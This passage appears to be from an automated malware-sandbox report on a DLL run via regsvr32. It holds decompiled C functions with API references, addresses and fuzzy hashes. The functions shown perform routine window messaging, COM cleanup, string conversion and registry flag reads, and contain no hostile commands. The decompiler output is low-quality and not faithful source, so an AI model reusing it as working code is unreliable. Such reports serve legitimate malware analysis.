								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

0x10022f73
0x10022f74
0x10022f77
0x10022f7e
0x10022f84
0x10022f89
0x10022f99
0x10022fb2
0x10022fba
0x10022fc2
0x10022fc5
0x10022fcf
0x10023010
0x10022fe5
0x10022fe9
0x10022ff6
0x00000000
0x10022ff8
0x10022ff8
0x10022ffe
0x00000000
0x1002306b
0x1002306b
0x1002306b
0x00000000
0x1002306b
0x10022ffe
0x00000000
0x10022ff6
0x1002301b
0x10023025
0x10023064
0x1002303b
0x10023040
0x10023043
0x10023058
0x10023058
0x10023062
0x00000000
0x00000000
0x10023045
0x10023053
0x00000000
0x10023055
0x10023055
0x00000000
0x10023055
0x10023053
0x00000000
0x10023043
0x10022f9b
0x10022fa4
0x10022fa9
0x10022fac
0x1002306e
0x10023077
0x00000000
0x00000000
0x00000000
0x10022fac
0x10023079
0x10023079
0x10022f89
0x1002307d

APIs

SendMessageA.USER32 ref: 10022FA4
SendMessageA.USER32 ref: 10023009
SendMessageA.USER32 ref: 1002304E
SendMessageA.USER32 ref: 10023077

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3c2821d2c01730d0e9e3d050fdca3f67cb787b233dffa796d2ae3b4fd65ef274
Instruction ID: eb435eb8790fdb392b85cf7e94e3c3ef61883645fe82c46af5ce08a909e1fc74
Opcode Fuzzy Hash: 3c2821d2c01730d0e9e3d050fdca3f67cb787b233dffa796d2ae3b4fd65ef274
Instruction Fuzzy Hash: E1316F30500219FFCB25DF55D8E1EAE7BE9EF01790F50806AF9059B216DA71ED81DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C667 Relevance: 6.1, APIs: 4, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E1000C667(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t71;

				_t71 = _a4 + 0xffffff2c;
				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
					return 0;
				}
				_t58 = _a8;
				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
					L4:
					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
						__imp__#9(_t71 + 0xa8);
						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
						_push( &_a4);
						_push(0x1002cfe8);
						_a4 = 0;
						_push(_t41);
						if( *((intOrPtr*)( *_t41))() >= 0) {
							E10012400( &_v56, 0, 0x20);
							E10012400( &_v24, 0, 0x10);
							_t47 = _a4;
							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x1002fb68, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
							_t60 = __imp__#6;
							_a8 = _t48;
							if(_v52 != 0) {
								 *_t60(_v52);
							}
							if(_v48 != 0) {
								 *_t60(_v48);
							}
							if(_v44 != 0) {
								 *_t60(_v44);
							}
							_t49 = _a4;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							if(_a8 >= 0) {
								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
							}
						}
					}
					_t39 = 0;
					goto L15;
				} else {
					_v60 = 2;
					_v56 = _t58;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					E1000AC01(_t71,  &_v60);
					_t39 = _v36;
					if(_t39 != 0) {
						L15:
						return _t39;
					}
					goto L4;
				}
			}

0x1000c672
0x1000c680
0x00000000
0x1000c682
0x1000c690
0x1000c693
0x1000c6c7
0x1000c6cd
0x1000c6da
0x1000c6e0
0x1000c6e6
0x1000c6e7
0x1000c6ec
0x1000c6f1
0x1000c6f6
0x1000c6ff
0x1000c70b
0x1000c710
0x1000c735
0x1000c73b
0x1000c741
0x1000c744
0x1000c749
0x1000c749
0x1000c74e
0x1000c753
0x1000c753
0x1000c758
0x1000c75d
0x1000c75d
0x1000c75f
0x1000c765
0x1000c76b
0x1000c76d
0x1000c76d
0x1000c76b
0x1000c6f6
0x1000c777
0x00000000
0x1000c695
0x1000c69b
0x1000c6a2
0x1000c6a5
0x1000c6a8
0x1000c6ab
0x1000c6ae
0x1000c6b1
0x1000c6b4
0x1000c6b7
0x1000c6bc
0x1000c6c1
0x1000c779
0x00000000
0x1000c779
0x00000000
0x1000c6c1

APIs

VariantClear.OLEAUT32(?), ref: 1000C6DA
SysFreeString.OLEAUT32(?), ref: 1000C749
SysFreeString.OLEAUT32(?), ref: 1000C753
SysFreeString.OLEAUT32(?), ref: 1000C75D

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeString$ClearVariant
String ID:
API String ID: 3349467263-0
Opcode ID: 8081ddf9c49625f3210156444a31ac976f120d6f02dfe19842348a48be0f878d
Instruction ID: 422d1a6ef49465b8a85e9ad1b89baa88a5c31b660c424cf8f1d44a9922b37e56
Opcode Fuzzy Hash: 8081ddf9c49625f3210156444a31ac976f120d6f02dfe19842348a48be0f878d
Instruction Fuzzy Hash: 71310571911219AFDB04DFA5CC84EDEBBB8FF09790F10821AF509A6254D770A984CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001C96A Relevance: 6.1, APIs: 4, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001C96A(void* __ecx, void* __eflags) {
				short* _t40;
				intOrPtr _t42;
				int _t57;
				short* _t64;
				int _t67;
				void* _t68;
				short* _t69;

				_t58 = __ecx;
				_t69 =  *(_t68 - 0x18);
				E100114D8(__ecx, __eflags);
				 *(_t68 - 0x34) =  *(_t68 - 0x34) & 0x00000000;
				 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
				_t57 =  *(_t68 - 0x48);
				_t40 =  *(_t68 - 0x34);
				if(_t40 != 0) {
					L4:
					if(MultiByteToWideChar( *(_t68 + 0x20), 1,  *(_t68 + 0x10),  *(_t68 + 0x14), _t40, _t57) != 0) {
						_t67 = MultiByteToWideChar( *(_t68 + 0x20), 9,  *(_t68 + 0x18),  *(_t68 + 0x1c), 0, 0);
						 *(_t68 - 0x4c) = _t67;
						if(_t67 != 0) {
							 *(_t68 - 4) = 1;
							E100116D0(_t67 + _t67 + 0x00000003 & 0xfffffffc, _t58);
							 *(_t68 - 0x18) = _t69;
							_t64 = _t69;
							 *(_t68 - 0x50) = _t64;
							 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
							if(_t64 != 0) {
								L10:
								if(MultiByteToWideChar( *(_t68 + 0x20), 1,  *(_t68 + 0x18),  *(_t68 + 0x1c), _t64, _t67) != 0) {
									 *((intOrPtr*)(_t68 - 0x40)) = CompareStringW( *(_t68 + 8),  *(_t68 + 0xc),  *(_t68 - 0x34), _t57, _t64, _t67);
								}
								if( *(_t68 - 0x44) != 0) {
									_push(_t64);
									E1001111B();
								}
							} else {
								_t64 = E10011233(_t67 + _t67);
								if(_t64 != 0) {
									 *(_t68 - 0x44) = 1;
									goto L10;
								}
							}
						}
					}
					if( *((intOrPtr*)(_t68 - 0x3c)) != 0) {
						_push( *(_t68 - 0x34));
						E1001111B();
					}
					_t42 =  *((intOrPtr*)(_t68 - 0x40));
				} else {
					_t40 = E10011233(_t57 + _t57);
					_pop(_t58);
					 *(_t68 - 0x34) = _t40;
					if(_t40 == 0) {
						_t42 = 0;
					} else {
						 *((intOrPtr*)(_t68 - 0x3c)) = 1;
						goto L4;
					}
				}
				return E10012D1B(E10011A49(_t42,  *((intOrPtr*)(_t68 - 0x1c))));
			}

0x1001c96a
0x1001c96a
0x1001c96d
0x1001c972
0x1001c976
0x1001c97a
0x1001c982
0x1001c987
0x1001c9a1
0x1001c9b5
0x1001c9d0
0x1001c9d2
0x1001c9d7
0x1001c9dd
0x1001c9ed
0x1001c9f2
0x1001c9f5
0x1001c9f7
0x1001c9fa
0x1001ca1a
0x1001ca33
0x1001ca48
0x1001ca5c
0x1001ca5c
0x1001ca63
0x1001ca65
0x1001ca66
0x1001ca6b
0x1001ca1c
0x1001ca26
0x1001ca2a
0x1001ca2c
0x00000000
0x1001ca2c
0x1001ca2a
0x1001ca1a
0x1001c9d7
0x1001ca70
0x1001ca72
0x1001ca75
0x1001ca7a
0x1001ca7b
0x1001c989
0x1001c98d
0x1001c992
0x1001c993
0x1001c998
0x1001cab0
0x1001c99e
0x1001c99e
0x00000000
0x1001c99e
0x1001c998
0x1001cb41

APIs

Part of subcall function 100114D8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 100114F2
Part of subcall function 100114D8: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10011503
Part of subcall function 100114D8: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 10011549

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001C9AD
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100108AC,00000000,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001C9CA
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100108AC,?,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001CA40
CompareStringW.KERNEL32(?,?,00000190,00000000,?,00000000,?,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001CA56

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
String ID:
API String ID: 1997773198-0
Opcode ID: ebfc69af8520cc5b7db72a0f94127b0aed85610ace023d4169a4354396c1be3a
Instruction ID: a8cdb39f24e1e967be4b4b359fa5767401671b4154b716162f0d0c7b8958fa92
Opcode Fuzzy Hash: ebfc69af8520cc5b7db72a0f94127b0aed85610ace023d4169a4354396c1be3a
Instruction Fuzzy Hash: 67315A7280121CEBDF12CFA0DC45ADEBBB5FF08754F640104F910AA1A0DB30DA91DB91

Uniqueness

Uniqueness Score: -1.00%

Function 1001697E Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1001697E() {
				void* __ebp;
				signed int _t5;
				intOrPtr _t6;
				signed int _t11;
				void* _t12;
				signed int _t13;
				signed int _t24;
				signed int _t25;
				intOrPtr* _t26;
				char* _t27;
				void* _t30;
				intOrPtr _t32;

				_t32 =  *0x1003ba4c; // 0x1
				if(_t32 == 0) {
					_t5 = E10012B24();
				}
				_t26 =  *0x1003a160; // 0x0
				_t24 = 0;
				if(_t26 != 0) {
					while(1) {
						_t6 =  *_t26;
						if(_t6 == 0) {
							break;
						}
						if(_t6 != 0x3d) {
							_t24 = _t24 + 1;
						}
						_t26 = _t26 + E10012000(_t26) + 1;
					}
					_t5 = E10011233(4 + _t24 * 4);
					_t25 = _t5;
					 *0x1003a194 = _t25;
					if(_t25 != 0) {
						_t27 =  *0x1003a160; // 0x0
						while( *_t27 != 0) {
							_t30 = E10012000(_t27) + 1;
							if( *_t27 == 0x3d) {
								L14:
								_t27 = _t27 + _t30;
								continue;
							}
							_t12 = E10011233(_t30);
							 *_t25 = _t12;
							if(_t12 == 0) {
								_push( *0x1003a194);
								_t13 = E1001111B();
								 *0x1003a194 = 0;
								_t11 = _t13 | 0xffffffff;
								L17:
								return _t11;
							}
							E10018100(_t12, _t27);
							_t25 = _t25 + 4;
							goto L14;
						}
						_push( *0x1003a160);
						E1001111B();
						 *0x1003a160 = 0;
						 *_t25 = 0;
						 *0x1003ba40 = 1;
						_t11 = 0;
						goto L17;
					}
					goto L9;
				} else {
					L9:
					return _t5 | 0xffffffff;
				}
			}

0x10016981
0x10016989
0x1001698b
0x1001698b
0x10016990
0x10016996
0x1001699a
0x100169ae
0x100169ae
0x100169b2
0x00000000
0x00000000
0x100169a0
0x100169a2
0x100169a2
0x100169aa
0x100169aa
0x100169bc
0x100169c1
0x100169c6
0x100169cc
0x100169d3
0x10016a06
0x100169e4
0x100169e9
0x10016a04
0x10016a04
0x00000000
0x10016a04
0x100169ec
0x100169f4
0x100169f6
0x10016a2f
0x10016a35
0x10016a3a
0x10016a40
0x10016a29
0x00000000
0x10016a2a
0x100169fa
0x10016a01
0x00000000
0x10016a01
0x10016a0a
0x10016a10
0x10016a15
0x10016a1b
0x10016a1d
0x10016a27
0x00000000
0x10016a27
0x00000000
0x1001699c
0x100169ce
0x00000000
0x100169ce

APIs

___initmbctable.LIBCMT ref: 1001698B
_strlen.LIBCMT ref: 100169A4
_strlen.LIBCMT ref: 100169DD
_strcat.LIBCMT ref: 100169FA

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _strlen$___initmbctable_strcat
String ID:
API String ID: 109824703-0
Opcode ID: 717aadb1e26b71317ee544c053848e46776130a65afe85ff3f16a5ab4fb1cad3
Instruction ID: da45c1c96dbea4fc8541333c58f74f831b575934684ebe3a29e1dc97d659d8db
Opcode Fuzzy Hash: 717aadb1e26b71317ee544c053848e46776130a65afe85ff3f16a5ab4fb1cad3
Instruction Fuzzy Hash: ED1189728085645FF323DF605C8064A7BD9FB0A2A4B21012EF6908F162CB34E8C1DB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000C2BC Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000C2BC(void* __edi) {
				intOrPtr _t35;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				signed int _t60;
				void* _t63;

				E10011A8C(E1002ABEC, _t63);
				_t60 = 0;
				 *((intOrPtr*)(_t63 - 0x10)) = 0;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x1002c6bc;
				_t48 =  *((intOrPtr*)(_t63 + 8));
				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = 0;
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t48 - 8)) == 0) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t48 - 0xac)) + 0x1c)) + 0x1c)));
					_t35 = E10024DD7();
					 *((intOrPtr*)(_t48 - 8)) = _t35;
					if(_t35 == 0) {
						goto L1;
					} else {
						if( *(_t63 + 0xc) != 0) {
							IntersectRect(_t63 - 0x24, _t48 - 0x9c,  *(_t63 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t60 = 0;
						}
						E100250CC(_t63 - 0x14, CreateRectRgnIndirect(_t63 - 0x24));
						E10024C41( *((intOrPtr*)(_t48 - 8)), _t63 - 0x14, 1);
						_t50 =  *((intOrPtr*)(_t48 - 8));
						if(_t50 != _t60) {
							_t46 =  *((intOrPtr*)(_t50 + 4));
						} else {
							_t46 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = _t46;
					}
				} else {
					L1:
					_t60 = 0x80004005;
				}
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x1002c6ac;
				E10025123(_t63 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t60;
			}

0x1000c2c1
0x1000c2cb
0x1000c2cd
0x1000c2d0
0x1000c2da
0x1000c2dd
0x1000c2e2
0x1000c2e5
0x1000c300
0x1000c301
0x1000c308
0x1000c30b
0x00000000
0x1000c30d
0x1000c310
0x1000c333
0x1000c312
0x1000c31c
0x1000c31d
0x1000c31e
0x1000c31f
0x1000c320
0x1000c322
0x1000c347
0x1000c355
0x1000c35a
0x1000c35f
0x1000c365
0x1000c361
0x1000c361
0x1000c361
0x1000c36b
0x1000c36b
0x1000c2e7
0x1000c2e7
0x1000c2e7
0x1000c2e7
0x1000c36d
0x1000c374
0x1000c37b
0x1000c387
0x1000c38f

APIs

__EH_prolog.LIBCMT ref: 1000C2C1
GetDC.USER32(?), ref: 1000C2FA
CreateRectRgnIndirect.GDI32(?), ref: 1000C33D

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateH_prologIndirectRect
String ID:
API String ID: 2123978231-0
Opcode ID: 59661191850b4aec87681aff55e74d871da990b98148a2480edac10668ff53cf
Instruction ID: 2d32c559a3666166c725aa369185452b7082f210ee70bac2ef3761f3e5453f97
Opcode Fuzzy Hash: 59661191850b4aec87681aff55e74d871da990b98148a2480edac10668ff53cf
Instruction Fuzzy Hash: 6A213976910219EBDB01DFA4D984D8EB7B8FF09781F618066E901EB245C771AE01CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 10026B36 Relevance: 6.1, APIs: 4, Instructions: 71
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10026B36(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				char* _t32;
				intOrPtr _t34;
				char** _t35;
				signed int _t40;
				char** _t44;
				char* _t46;

				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				_t46 =  *0x100361b8; // 0x1002bc94
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t35 = 0x100361b8;
				if(_t46 == 0) {
					L13:
					RegCloseKey(0);
					return 1;
				}
				do {
					if(RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8) != 0) {
						goto L11;
					}
					_t8 =  &(_t35[1]); // 0x10036180
					_t44 =  *_t8;
					while(1) {
						_t32 =  *_t44;
						if(_t32 == 0) {
							goto L11;
						}
						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t34 = _v20;
							_t16 =  &(_t44[1]); // 0x1
							_t40 =  *_t16;
							if(_v12 == 0) {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
							} else {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t44 =  &(_t44[2]);
					}
					L11:
					RegCloseKey(_v8);
					_t35 =  &(_t35[2]);
					_v8 = 0;
				} while ( *_t35 != 0);
				goto L13;
			}

0x10026b40
0x10026b46
0x10026b4c
0x10026b4f
0x10026b52
0x10026b55
0x10026b5c
0x10026b5f
0x10026b64
0x10026bf2
0x10026bf3
0x10026bff
0x10026bff
0x10026b6b
0x10026b81
0x00000000
0x00000000
0x10026b83
0x10026b83
0x10026bd4
0x10026bd4
0x10026bd8
0x00000000
0x00000000
0x10026ba1
0x10026bac
0x10026baf
0x10026baf
0x10026bb2
0x10026bbe
0x10026bb4
0x10026bb4
0x10026bb4
0x10026bb2
0x10026bc4
0x10026bc7
0x10026bce
0x10026bd1
0x10026bd1
0x10026bda
0x10026bdd
0x10026be3
0x10026be8
0x10026be8
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000001,100361B8,00000000,00000001,?), ref: 10026B79
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 10026B99
RegCloseKey.ADVAPI32(?), ref: 10026BDD
RegCloseKey.ADVAPI32(00000000), ref: 10026BF3

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Close$OpenQueryValue
String ID:
API String ID: 1607946009-0
Opcode ID: cc5f0c99c487882ade0354347c01d17bd8f5ae0b98e1250bf4d183fc974c7e55
Instruction ID: c96fa91f90e85e768a28330d4fbd3614d76b6cf8de282428f297b7c8f9744a42
Opcode Fuzzy Hash: cc5f0c99c487882ade0354347c01d17bd8f5ae0b98e1250bf4d183fc974c7e55
Instruction Fuzzy Hash: CF214F71D00219EFEB02CF85DC85AAEBBF8EF54755F6180AAE415E6151D3705A45CF20

Uniqueness

Uniqueness Score: -1.00%

Function 1000D486 Relevance: 6.1, APIs: 4, Instructions: 66
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E1000D486(signed int _a4, signed int* _a8, intOrPtr _a12) {
				void* _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t14;
				}
				_t23 = _a4;
				if((_t23 & 0x00000020) == 0) {
					_t16 = (_t23 & 0x0000ffff) - 8;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t16;
					}
					_t17 = _t16 - 1;
					__eflags = _t17;
					if(_t17 == 0) {
						L13:
						_t16 =  *_t31;
						__eflags = _t16;
						if(_t16 == 0) {
							goto L17;
						}
						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
						goto L16;
					}
					_t16 = _t17 - 3;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t18 = _t16 - 1;
					__eflags = _t18;
					if(_t18 == 0) {
						goto L13;
					}
					_t16 = _t18 - 0x7b;
					__eflags = _t16;
					if(__eflags == 0) {
						E1000D409( &_a8, __eflags, _a12);
						_t20 = _a8;
						__eflags = _t20;
						if(_t20 != 0) {
							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
						}
						_t16 = L1000CCB3( &_a8);
					}
					goto L17;
				}
				_t16 =  *_t31;
				if(_t16 == 0) {
					goto L17;
				}
				__imp__#16(_t16);
				goto L16;
			}

0x1000d48a
0x1000d48f
0x1000d52a
0x1000d52a
0x1000d496
0x1000d49c
0x1000d4b0
0x1000d4b0
0x1000d4b3
0x1000d504
0x1000d50a
0x1000d50a
0x1000d50d
0x1000d510
0x1000d521
0x1000d521
0x00000000
0x1000d527
0x1000d4b5
0x1000d4b5
0x1000d4b6
0x1000d4f4
0x1000d4f4
0x1000d4f6
0x1000d4f8
0x00000000
0x00000000
0x1000d4fd
0x00000000
0x1000d4fd
0x1000d4b8
0x1000d4b8
0x1000d4bb
0x1000d4ec
0x00000000
0x1000d4ec
0x1000d4bd
0x1000d4bd
0x1000d4be
0x00000000
0x00000000
0x1000d4c0
0x1000d4c0
0x1000d4c3
0x1000d4cb
0x1000d4d0
0x1000d4d3
0x1000d4d5
0x1000d4de
0x1000d4de
0x1000d4e4
0x1000d4e4
0x00000000
0x1000d4c3
0x1000d49e
0x1000d4a2
0x00000000
0x00000000
0x1000d4a5
0x00000000

APIs

SafeArrayDestroy.OLEAUT32 ref: 1000D4A5
CoTaskMemFree.OLE32(?), ref: 1000D521

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: a07d396bbf0a29ec4320d3e374e7d046f4127018dcad5f6126624739024cb51f
Instruction ID: a0175064a0a85c4cafe7825df45cf47a0c0107eac02822587324b58b302c8d00
Opcode Fuzzy Hash: a07d396bbf0a29ec4320d3e374e7d046f4127018dcad5f6126624739024cb51f
Instruction Fuzzy Hash: 2A115E30500A16DBFB50EF64DC84BAE7BE4FF013D6F204417EC558A1A8CB34E901DA60

Uniqueness

Uniqueness Score: -1.00%

Function 1000C404 Relevance: 6.1, APIs: 4, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E1000C404(void* __edi) {
				int _t36;
				void* _t52;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;

				E10011A8C(E1002ABEC, _t58);
				 *((intOrPtr*)(_t58 - 0x10)) = 0;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x1002c6bc;
				_t55 =  *((intOrPtr*)(_t58 + 8));
				 *(_t58 - 4) = 0;
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t58 + 0xc)));
					_t52 = E100250BE();
					GetRgnBox( *(_t52 + 4), _t58 - 0x24);
					IntersectRect(_t58 - 0x34, _t58 - 0x24, _t55 - 0x9c);
					_t36 = EqualRect(_t58 - 0x34, _t58 - 0x24);
					_push( *((intOrPtr*)(_t58 + 0x10)));
					if(_t36 != 0) {
						_push(_t52);
						E1000B8D2( *((intOrPtr*)( *((intOrPtr*)(_t55 - 0xac)) + 0x1c)));
						_t56 = 0;
					} else {
						_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0);
					}
				} else {
					_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0,  *((intOrPtr*)(_t58 + 0x10)));
				}
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x1002c6ac;
				E10025123(_t58 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t56;
			}

0x1000c409
0x1000c415
0x1000c418
0x1000c422
0x1000c425
0x1000c428
0x1000c439
0x1000c441
0x1000c44a
0x1000c45f
0x1000c46d
0x1000c475
0x1000c478
0x1000c48e
0x1000c48f
0x1000c494
0x1000c47a
0x1000c481
0x1000c481
0x1000c42a
0x1000c434
0x1000c434
0x1000c497
0x1000c49e
0x1000c4a5
0x1000c4b1
0x1000c4b9

APIs

__EH_prolog.LIBCMT ref: 1000C409
